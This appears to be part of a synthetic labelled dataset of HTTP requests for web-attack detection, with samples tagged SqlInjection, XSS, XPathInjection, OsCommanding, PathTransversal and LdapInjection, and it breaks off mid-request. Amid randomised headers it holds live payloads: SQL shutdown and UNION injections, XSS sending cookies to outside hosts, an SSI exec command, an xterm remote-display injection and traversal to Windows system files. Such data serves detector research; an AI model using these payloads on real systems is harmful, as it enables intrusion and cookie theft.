Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="0"
Date: Wed, 29 Apr 09 20:42:51 CET
ETag: W/"@DakhjOrm.rOxbbGC"
Expect: n9b6et=eeaexsg
From: 1tXiees@Csgv.st
If-Modified-Since: Sun, 18 Mar 07 10:37:17 GMT
If-Unmodified-Since: Wed, 27 Oct 04 19:47:38 GMT
If-Match: "vkpoMkjmqoItnV73PGk"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 2.5
Pragma: lNemela='cO'
Proxy-Authorization: JslOti auhh=xthke
Authorization: Basic ZXNkdTphYjBlYWs=
Range: -4,92807-997,-01613
Referer: http://www.Oj5nney.gov/5Bao/rmrfe.asmx
TE: chunked;q=0.7
Trailer: Host
User-Agent: heoai (y11Npn)
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: identity
Upgrade: 2ac/9.1, rwme/4.7
Warning: 593 www.ibdmueus.shtml "Egye9eoeioV6AwrcnL" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42407
Start - Id: 35185
class: SqlInjection
GET /6qHqEp.zFzqA/5Iaehtk/u_-CH5V_xArO/9nemisdltesl/niahetsMh/1g/aes6lF8n/O@group byy1mLM/nU_zkMDOo5NJCdkB2LS.mdb?ltno4Sciiasifw=%27UNIONALLSELECTfieldFROMasngchseelWHERE%27%27++%3D+++%27&yjck6jxsystem=56560834 HTTP/1.1
Host: www.tdlmh.uk
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-icelandic, iso-8859-8, iso-8859-8-i, iso-8859-15;q=0.2, utf-7;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: eea=e8mkAx1f
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Tue, 05 Feb 08 15:55:18 UTC
ETag: W/"MmDAZwouxSzTM9a"
Expect: twhn
From: as5oeh@nl7ehee.ch
If-Modified-Since: Tue, 23 May 06 16:55:25 CET
If-Unmodified-Since: Fri, 21 May 04 18:51:43 GMT
If-Match: *
If-None-Match: "UkwHvXsSWbTZVHc834"
If-Range: *
Max-Forwards: 1
MIME-Version: 6.3
Pragma: AdmndsSs='5oUov'
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: ygte I5tn=ebhl
Range: -76801,392-,94069-
Referer: /1eNS/ohYtu/eeBhlaT7/srg3/tdmPtstw.jpeg
TE: deflate
Trailer: Referer
User-Agent: sQVevu http://www.UpfHg.org
UA-CPU: StrongARM
UA-Disp: 1981,291,8
UA-Color: color32
Via: FTP/3.0 www.idnZ5dhb.shtml:8947, 0.8 www.eosg.tiff, 8.2 226.51.246.82
Transfer-Encoding: mh2hj
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35185
Start - Id: 48642
class: XPathInjection
PUT /uy/UEGaccess_logzVexec4mq0QPiframe0/CLFqposition/eeaElxi.tiff? HTTP/1.0
Content-Length: 240
Content-Language: eec,wyyt3e
Content-Encoding: gzip
Content-Location: http://siguiot.be/Tdaf5L0k/teiod/igtc/jhvn.gif
Content-MD5: bXRldHM2aXNuTDNuc25PYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Apr 07 22:41:37 GMT
Last-Modified: Mon, 21 Jul 08 15:39:47 GMT
Host: www.Tse0a.ch
Connection: keep-alive
Accept: video/mpeg, application/*;q=0.8
Accept-Charset: iso-8859-1;q=0.7, cp-936;q=0.3, windows-874, koi8-r, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=24
Client-ip: 41.88.127.250
Cookie: ogeee=566;evnl2utlroi=h9auauot36fd;fiv=niteethconnectqSefeto4gsystem1
Cookie2: $Version="469"
Date: Tue, 19 May 09 20:48:38 UTC
ETag: W/"YKFJkoH9cKAkRI90WU"
Expect: enosallr
From: tyxcwa@tsnhtl.be
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Thu, 02 Oct 08 06:01:31 CET
If-Match: "sJecmBHBknBckAN3Ivo"
If-None-Match: "mF.zJ7@79eTsgSS8"
If-Range: "06ruObaJd@7qj4f"
Max-Forwards: 3520
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM dWFhdHU2ZTdvaWdpVGVFaWVpZGFlemc1ZW9zZTN0ZW5lc3FVdQ==
Range: -046912,8351-4,007308-22
Referer: /l9wot1m.php4
TE: gzip;q=0.1,trailers
Trailer: Warning
User-Agent: ncgr1ALesdem
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: FTP/8.3 www.u3ldr.html
Transfer-Encoding: compress
Upgrade: ohth/5.2
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lneml=eo4n' or   (i  <   count(rtMts9/child::text())   and    j     <   count(xnoe/child::comment())   and k  < count(pe/child::*)     )    or     'ueiniS'    = '     toeSeail'  or

End - Id: 48642
Start - Id: 46581
class: XSS
GET /a5dKCBqo9PfOA/aEru/lQ3C9p_gAY4OcpIy703/KoBrf/ehk3r/l5n36vXa1vltFwxUJ.sh?tr0eb=eCS48gMAmN&ht=or8a%40jtas%3A&caNih=nalie&szt=dnmeuimyuisi&P_JWasock_stream=-n%5Die&sa1scvauEnoniid=36852888&cuaevhteezergnp=Aetelapufodacis&fdide9yhoaa4aEe=133447593&3KKIZeFjE=74282068&aa=vede&hSrmI=%3C8tr&rebts9imesF=bH4.JyFAp HTTP/1.1
Host: www.dmmhe.com:564
Connection: fni3cA
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: 
Accept-Language: tKwor-3ctroeu;q=0.1, mhtaa-aha, rqahiao-2e9o4yi
Cache-Control: no-store
Client-ip: 107.181.44.200
Cookie: 2em7h=n~?ocm5t)0drnewindow.openr;leO1oagbeettt=sUwNC;R5w5RP=idNd4ds;nbphtfsecszcne=9mRI7iatte
Cookie2: $Version="12"
Date: Thu, 09 Feb 06 13:34:10 UTC
ETag: W/"ggPvguC2iGHQlzQ"
Expect: Oric=snie;reana=aeeuq
From: 0conyto@eglsirmhA.ch
If-Modified-Since: Wed, 31 Aug 05 09:57:39 CET
If-Unmodified-Since: Tue, 06 Apr 10 22:07:42 CET
If-Match: "lTRbir7Ntgos@Z1wSk"
If-None-Match: "UImmUVagNM87tvLHW"
If-Range: Thu, 18 Sep 08 21:04:25 UTC
Max-Forwards: 452
MIME-Version: 6.7
Pragma: s07tdbTh=hadsnns
Proxy-Authorization: NTLM cjdsdGM4YWNpdGJzb2UzaWhuY2g0dG9naXRiZG9laWZyOWlo
Authorization: ohri zcoo=lcgr
Range: 76-918888
Referer: http://i3sBeh.biz/iacoI.php
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: <img   src  =    "     javascript:   [window.open('http://83.244.116.45/on.php'+document.cookie);]  " >
UA-CPU: x86
UA-Disp: 676,907,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5605x1554
Via: FTP/7.0 www.tc3bnvy.htm, 0.7 250.202.235.159:79468
Transfer-Encoding: deflate
Upgrade: 2ijn/6.2
Warning: 726 www.ytnR.png "llgcrlhuiap" "Sat, 22 Mar 08 16:22:53 GMT"
X-Forwarded-For: 23.216.88.9
X-Serial-Number: 34246962990912
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46581
Start - Id: 36389
class: OsCommanding
POST /ala1N9tEd1APb_VFEwz.jpg? HTTP/1.0
Content-Length: 199
Content-Language: tr,s,aoeanZdT
Content-Encoding: identity
Content-Location: /tkve/weanStet.php
Content-MD5: OTh0YXdvZnRiYmVhcHJsQQ==
Content-Type: application/x-www-form-urlencoded
Host: www.oeuyp.net
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: us-ascii, euc-kr
Accept-Encoding: <!--   #exec     cmd="c:\progra~1\nh74eJdi4\s5iTi059Ot\hetd9tes.exe     d:\etf\www.tidensas.org\kDd6ttn\database.mdb /x     exporttofoxpro"-->
Accept-Language: *;q=0.5
Client-ip: 228.177.132.107
Date: Sat, 20 Mar 04 10:12:41 UTC
Max-Forwards: 782
Pragma: rzai=srtat
Authorization: NTLM aGNhdXB0eXRyenhhdzhsdmU5aVN0aDh1b2VlcHM4c2FuaQ==
Referer: /toeresom/Efjd7t/srLeune.tiff
User-Agent: Mozilla/9.4 (compatible; MSIE 4.8; Linux i386; Ecodt3)

t9leveen=i|oiOij5cieatv&selin=gs@RhC6h&cttleso6=73877018&T9stylennLP=2711553401&soTn7e=32853541&e4gawqueeui0oss=mHcstoeyJfprntes&dlsPf4nET1hs6=mn8idSpfetr7&leieAo=4s<&ZlogBMbUscriptexec=sgD@Y

End - Id: 36389
Start - Id: 45383
class: PathTransversal
POST /niag.html? HTTP/1.0
Content-Length: 288
Content-Language: 8,m,aaoilaAn
Content-Encoding: gzip
Content-Location: http://e4slsn.it/nhttocy/jolsoiE/wtc1eo/smooeaOe.shtml
Content-MD5: dHpzbGRvdHN0Q3JhZWNubQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Apr 06 22:48:51 CET
Last-Modified: Sat, 02 Apr 05 14:03:12 UTC
Host: 92.95.242.80
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: ogrnA-lgeto5yk, tiioe-Riy1iE;q=0.5
Cache-Control: no-transform
Client-ip: 141.158.68.48
Cookie: xSJbBs8BhTW=99;tl=26746;r7=:len
Cookie2: $Version="96"
Date: Thu, 29 Mar 07 12:05:30 CET
ETag: "5ocwXgsgWGwq92x.Rvo"
Expect: oepa
From: nnrEog@dpyieuR.com
If-Modified-Since: Thu, 10 Jun 04 14:12:45 UTC
If-Unmodified-Since: Thu, 10 Mar 05 07:48:10 UTC
If-Match: ".8OJH7-Crdvuffy_wPn"
If-None-Match: "DF49oJ3fqIoHh-M"
If-Range: Tue, 24 Mar 09 03:15:55 GMT
Max-Forwards: 6
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZW9yc3M6dWRheTI=
Authorization: Basic ZXJldHI6Y3ppZWU4cG8=
Range: 0524-
Referer: http://www.tcnvDuso.net/kwsaeiue/Tcsaihno/cdnonay/dtsla8o.txt
TE: trailers,deflate;q=0.5
Trailer: Max-Forwards
User-Agent: Mozilla/5.7 (X11; U; Linux i386 7.6; i5-u6; rv:3.5.8) Gecko/45516754
UA-CPU: Sparc
UA-Disp: 721,775,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 789x027
Via: 5.7 www.mn9qrrd.css, Ei2/4.9 215.206.48.5
Transfer-Encoding: gzip
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 851 99.105.244.225 "ewewAqyftpmnve" 
X-Forwarded-For: 177.133.223.189
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

agaacne=Msu:h&@H7rygJD=aBoEGx&isnnnihtnarseln=tiquuwyseYdfed&esiebob4so=9Lp_&ehpefCH=dOEssg&nh=7&vPT_Br6gO-6=7151879&dtMyeztss8op=ege&JlibN@=19497912&8ucatd=(O5u enxsabinate&bgsoundI0nph-V6havinge=FaehorUmsaw5et&t9Eoia=../../../../../../../../../WINNT/autoexec.bat

End - Id: 45383
Start - Id: 48920
class: XPathInjection
GET /vengEehisdsx/s5/vORoPoorVN/0e/2rtnwhnccichbjSyaweu.jpg?N7LiMtQcrbetweenK=%25xw3&on6bldue=316485119&eDegHovleaan=oaeT%24%5Ddtn1&4WmFWe3xg=56&o2ft0iseg=sahws%2Fpn&cim=uid+C&ifHstenoqmtoEs7=E8ht&bodyYiframeDPa.Nx7=FVeyu%27++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++%27onehX%27++++%3D++++%27&nUisHrajsl=odal HTTP/1.1
Host: www.rouoo.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: jehtcepT-honr;q=0.7, Oceau-ras, p-o6aoexrh, bsoA3la-nn;q=0.2, mVecN6u-aane;q=0.5
Cache-Control: min-fresh=5108
Client-ip: 33.184.179.137
Cookie: oslis4er6=elsmailu>Am;ymiol2IhiEei=42;lqOrnuhyln=na;hRwget6t1pAmy=m6OLziFNB;hh2ektuvn4otp0o=@eMEhtoppmo0
Cookie2: $Version="6"
Date: Mon, 09 Jul 07 02:30:39 CET
ETag: W/"cAe5kf1_9HIkvNMxj_FA"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Sat, 15 Jul 06 04:58:38 UTC
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: "JY5ax02BTUC8TGhj"
If-None-Match: *
If-Range: "Ad@kEKKeND1Ur7a.W"
Max-Forwards: 0
MIME-Version: 7.0
Pragma: egtel='awitr'
Proxy-Authorization: Digest response="f4fa2C3be9dCA3EBbB36Ea92bAdd9Da1"
Authorization: Basic YXNkZTp3bjY0
Range: 1264-
Referer: http://www.rmevtc.de/a4rtih/o47dp/eattih/a6t5hel/aeru.gz
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/1.9 (Machintosh; U; PPC Mac OS X 2.5; eJ-sj; rv:6.7.5) Gecko/18928508
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 508x349
Via: 0.5 www.eiWt9ls.css:1, 6.0 www.aset.css:7, FTP/3.4 135.56.67.62
Transfer-Encoding: compress
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 893 27.190.237.63 "taIazhQdsogaUn5mo" 
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 90589069814400492161
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48920
Start - Id: 45077
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.9GtAtbpeso.de
Connection: toijoefa
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: iy9-dejrorl;q=0.9, l6Hsa2-eejelf9;q=0.5, p2rat-a, otaiAwou-sdrr1ahw;q=0.1
Cache-Control: no-store
Client-ip: 101.182.197.221
Cookie: Sand@uBstyle=602505
Cookie2: $Version="785"
Date: Fri, 17 Sep 04 10:04:10 CET
ETag: "0GbJoMCi@JTjqEsBGN"
Expect: 100-continue
From: hn2w6xt1@ocg8cedowl.net
If-Modified-Since: Mon, 14 Nov 05 03:21:58 GMT
If-Unmodified-Since: Tue, 14 Apr 09 19:07:45 UTC
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 7
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: NTLM bnJuemVma25tY3JTcm5abm1lb3RoYXRlbm5pZm9yb25sMkU=
Range: 51016-,-10087
Referer: /aoTs78u/eNrrnsr.php4
TE: gzip
Trailer: Range
User-Agent: 4spirh (iHG8A6mw; i67X4Z1E.)
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 003x764
Via: HTTP/8.1 www.3dnajra.htm
Transfer-Encoding: compress
Upgrade: nadi/5.9, zccv3/4.5, 3E2ei/5.6
Warning: 104 125.112.41.82 "yseeslcne" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45077
Start - Id: 45801
class: PathTransversal
GET /xySi@qAL6Psyf/oewphensanato/bI6LLmQscripthD5/twg9XLi@c.jpg?uto=iojps_oOgJ&3t3YZ_7M.=udI&a8cAytgicausEs=4rmsrtzn&r2cuqRjOe=l1U280l&widtt=a%4001Jc22&Nstenwth4zdst=77579752&lS1eiacokkq5xr=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&lesc0ypbdgdxner=idnuahatdt0imt&oa8AontyAoSsMt=liedthmunaet&_sZ2bIb=05853&nleuactah6iDr8=tnntpa&Aeh2H=a%40 HTTP/1.0
Host: 171.155.235.223
Connection: ou7n
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.5, compress, identity, identity;q=0.0
Accept-Language: as-eu6a0rdm;q=0.8, f-0, ALco-n17rqi4e, achOdl-geadc;q=0.5, 8Iel-csatvure;q=0.8
Cache-Control: max-stale
Client-ip: 89.136.143.100
Cookie: roirui=2RG;hhsShctrtn6=bto%a;4t8Qmps=8..1Vuyl;nwnprUlfis=liket;rw=221;Txfsnl3tntshhbJ=16146758
Cookie2: $Version="085"
Date: Wed, 02 Jul 08 24:31:59 GMT
ETag: W/"-frtivihj-@TdEy9aa"
Expect: 100-continue
From: mzkc3t@iIdwe.ch
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: "lN4y2yoNZjxbveeM5G"
If-None-Match: *
If-Range: Sun, 14 Jan 07 15:57:04 CET
Max-Forwards: 497
MIME-Version: 2.9
Pragma: oroflvh=7Are
Proxy-Authorization: NTLM ckh0ejB0a2F0aTduaXR2bHNpdG13dG9zNXJsYmxyZnk=
Authorization: Digest qop=bEneli
Range: 151606-
Referer: http://www.hins.org/emrsYt.swf
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.2 (compatible; stisieO; Linux i386; hNotilfn; noptictj; dtetbbe)
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9422x259
Via: 3.7 25.113.168.162, FTP/7.2 148.228.246.44
Transfer-Encoding: identity
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 157.18.224.28
X-Serial-Number: 97437776345
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45801
Start - Id: 37292
class: LdapInjection
POST /5aeqoxe9/grazXOnj-b/group by2y81exec/iRdCh7eRH0fQ3DONaN/edpdn5S4esoeshiebdTu/eDy.sh? HTTP/1.1
Content-Length: 147
Content-Language: tr
Content-Encoding: deflate
Content-Location: /naey/enhE/rw8hw.dll
Content-MD5: ZWFlYW9ObmRyaGhsb3Rzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Jun 08 22:24:43 UTC
Last-Modified: Sun, 07 Mar 04 10:01:30 CET
Host: www.4HeJh.gov
Connection: close
Accept: */*
Accept-Charset: iso-8859-8, koi8-r, x-mac-turkish
Accept-Encoding: *
Accept-Language: sShalCef-epH;q=0.4, 8so2sioN-dAeoegFi
Cache-Control: max-stale
Cookie: ntz0=9u9RFyz;EOcnERobss1nea=xtfO;oniaueoav=grs2Nnm;eceek=")(targetfilter=(o=NetscapeRoot));dqasi9n=e3-X7DC8TDc.
Cookie2: $Version="15"
Date: Thu, 01 Oct 09 17:29:17 UTC
ETag: "Ht5wuBfylZCo@.3Go"
Expect: stltId=rtooetl;rpm0fnt
If-Modified-Since: Tue, 19 Jun 07 14:38:32 GMT
If-Unmodified-Since: Wed, 24 Jan 07 08:16:00 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 04 May 04 15:04:49 CET
Max-Forwards: 8
MIME-Version: 2.3
Pragma: n=mooidN4s
Proxy-Authorization: euroth rnrIt=sutsw
Authorization: NTLM aW5lbW5hYWRoaW90YmVuYWxlZHNkbjlpZG1yYm9nMGZ0
Referer: http://hnfi.gov/awB1/eaOnvE/uscst/lguiN5d/9eeep.mdb
TE: chunked;q=0.9,trailers,chunked;q=0.7
Trailer: Proxy-Authorization
User-Agent: licuu9/3.4.2.0
UA-CPU: 68000
UA-OS: Win98
Via: 5.2 www.pcR3.html
Transfer-Encoding: deflate
Upgrade: dtca/2.7, emzhfe/8.1, Aaqti/2.9, ghve/3.6, pern/5.2
Warning: 504 www.ir4ljlee.js "3hjr" "Wed, 30 Jan 08 20:06:56 GMT"
----: ----------------------------------------------

FVdJP-KYQ9=00&ea=86202621&acTe=hif9i&iS3n33hOocatE=2&aaijti5oetoil=iJIzJXB&thscnc6hdrdr3i=ttnetcate$Oe&ae3hnHdhmt=30&f8cdEshyewdI=1Otvicdaa6ras1i

End - Id: 37292
Start - Id: 38235
class: LdapInjection
GET /6k/34IGBxGSmopenSZcy/rn1tokooteosioad/ip3ie/1qju2gIZ.shtml?enDuctbV08yndx=imeg&g43Hs5F=20%29%28%26%28objectClass%3Dnrsi%29%28%7C%28sn%3D+++mn%29%28cn%3Dezt++++J*%29%29&Eetc_Qk0B9B=ii5Somochaeosdcs%27+at+&ameAbnhos=e9qFp&vbscripttNkP8UP=jkn3prnetcabinunph-2&1rymemlnsao=y&imaam=1431&-DgtKsamIqmailH=tFcjckN&cd6Asdaya=+M&3no0DaaabAts2eo=294564&Eu7ytHniibaa=ae+sTy&gi=e_n_fT HTTP/1.1
Host: 181.157.180.39
Connection: close
Accept: audio/*, image/*
Accept-Charset: x-mac-arabic;q=0.1, us-ascii, x-mac-icelandic, x-mac-roman, windows-1255;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: nntaENh-Hn5i;q=0.4, ks6E-ne, 2r3ui-hhes, 6b-aueE;q=0.1
Cache-Control: max-stale=42434
Client-ip: 132.120.171.48
Cookie: Gdgs3e-r-=DuCltaPasca;eYtoep9csHiE=oi6q
Cookie2: $Version="8"
Date: Thu, 09 Nov 06 17:56:32 GMT
ETag: W/"yj9HscbVCYx@8PeL"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Mon, 12 Jun 06 14:40:50 GMT
If-Unmodified-Since: Sat, 20 Sep 08 22:12:58 UTC
If-Match: "3nsYqJH_6IwPY.6A"
If-None-Match: "rie.yHCsx6GR3LJnZ"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.6
Pragma: eertnoe=iur
Proxy-Authorization: NTLM dGJyYmVzYTJmYWlveUhzNzdyaGJkdzVpbGF0WnRpV256ZmFzdGxtZA==
Authorization: Basic dGVhNmVlbjp6T21ucw==
Range: -9629,18880-,-775909
Referer: http://www.etetPtoa.cz/hseo/nhsk/yjce/t7eemar.sh
TE: trailers,deflate
Trailer: Connection
User-Agent: vAC3he (ncAlQB; izCsw.; sT42uuMg; eb2m7-)
UA-CPU: StrongARM
UA-Disp: 296,8945,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 835x0812
Via: 2.6 www.nnepvn.png
Transfer-Encoding: identity
Upgrade: gcslf/0.5, byhs/2.3, tt7d/1.7
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38235
Start - Id: 36718
class: OsCommanding
GET /8pKcWBjBT4kC/M_qoUGIZDbgY@/dKKTaB.-E2zs/intnT4Hsetemd/neloneaieotr/ojZEeY8CLvL/ebRjkkA3V.aspx?zdSsv=4&dhJYwr1@8=1&EA=%250A+++xterm+++-display+++www.veestitiin.com%3A0.0++&tevlhJt0let=8079 HTTP/1.0
Host: www.3tsoah.it
Connection: keep-alive
Accept: application/zip;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: compress
Accept-Language: pP-teuEn;q=0.5, uEhee-e3M
Cache-Control: max-stale
Client-ip: 234.49.182.184
Cookie: EsVaApM_=mDJgGwwqojlH;ewIrucrropAp=n9&
Date: Wed, 17 Mar 04 15:30:42 CET
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: 100-continue
From: tiesic@4ercsals.org
If-Modified-Since: Wed, 14 Feb 07 01:05:49 UTC
If-Unmodified-Since: Thu, 14 Oct 04 24:46:56 UTC
If-Match: "xRNpsNdhd2nrqw9fb"
If-None-Match: *
If-Range: Sat, 26 Apr 08 12:27:54 UTC
Max-Forwards: 030
MIME-Version: 6.4
Pragma: no-cache
Authorization: fsimhs oedsio=7eRjsxzv
Range: 36-238879
Referer: http://ries.de/toRo/dolppt/dxegb.nsf
TE: trailers
User-Agent: khDdhl (s4ZmYD; emSdJVdD; q3L7XJDSr; nRilPmKuk; hby.nuAh)
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 656x0255
Transfer-Encoding: 45a7
X-Forwarded-For: 18.24.168.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36718
Start - Id: 47273
class: XSS
GET /exn5no/td1MahnzmDNopenK.shtml?nqs=d6mPHgMU6JY&Ots2tSanrp6aa=oyae&sjn=94&kprreeee=vsw7st0i2b6v&4ne=ettesRsea&sszehhe=eoa1hon&W00Zhfrom=%3Cdiv+++++style++%3D%22background-image%3A+url%28javascript%3A++++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.roneanng.com%2Fcgi-bin%2Fmais.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+++%22++%3E HTTP/1.0
Host: www.ddhasis.be:9877
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: BN=ro5hice
Client-ip: 10.37.184.28
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="51"
Date: Sun, 14 Mar 04 10:47:19 UTC
ETag: W/"Ufd2bZimO@p87fbplQ"
Expect: eplnt
From: se1aat@feeu.net
If-Modified-Since: Mon, 23 Oct 06 13:30:24 GMT
If-Unmodified-Since: Wed, 26 Nov 08 04:53:56 CET
If-Match: *
If-None-Match: *
If-Range: ".Ne57r4fVAvxxuq"
Max-Forwards: 0
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic YWp3VGFoekU6aW1ycUI=
Range: 3-25949,-0524
Referer: http://eacm.net/ssarmaa/0saut/pidaqtS9/cntdf0.tar
TE: deflate;q=0.4,trailers
Trailer: Trailer
User-Agent: eraen (aRAzAd; hQZATIFT; vG_CRFoYX)
UA-CPU: x86
UA-Disp: 263,853,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 753x7661
Via: 6.0 www.ijtTei.jpeg, 8.1 75.31.243.94, 7.2 www.zuqtoe.css
Transfer-Encoding: gzip
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 851 www.in8ulg.gif "bqIlypddus4o" "Fri, 11 Sep 09 02:10:10 CET"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47273
Start - Id: 41809
class: SqlInjection
GET /eoe/eyFaRtL3-F3Y2FEbJG/riewolh/laecntadog4mla3it/noak8vl/iEKm.msf?bc=r2o&in=fi&Xtaetrt=98208096&dsveonl=16&iteedoietiaho=br&tictvPsrft=%27%3B+++shutdown--&p6eiine8eenre9t=iISayiec&tttts=93&m0aadeys7l=iiTthio+%3AFicc&nI=85378389&oaraIstddcEa=91&eTl7rtinsnEla=8&lnim1avfphi=copyo HTTP/1.0
Host: 182.222.245.140:2
Connection: lsmOdO
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, compress, gzip, deflate, deflate
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 175.74.180.28
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="94"
Date: Mon, 05 Apr 04 07:02:30 GMT
ETag: W/"B9vez_6N2C2hWas2l"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 30 Jul 09 02:26:45 GMT
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: *
If-Range: "hFmuvj6yMnDQwi16iP"
Max-Forwards: 84
MIME-Version: 8.0
Pragma: nner0e=nccidys
Proxy-Authorization: NTLM bm5leWhtb3RheFRJaWVoc3RlaGN0dG1hN2VkaUhhcWRhZFVzaGN0dW51d2U=
Authorization: FPtis ticgSoh=utIeeae
Range: 340098-821
Referer: /ds7aae/ekta/IrXy12xt/srEuyw.htm
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/1.4 (Machintosh; U; PPC 1.3; b2-cl; rv:9.5.5) Gecko/93395252
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7095x5636
Via: 4.7 0.69.197.174, 6.1 www.nmnt.jpeg
Transfer-Encoding: gzip
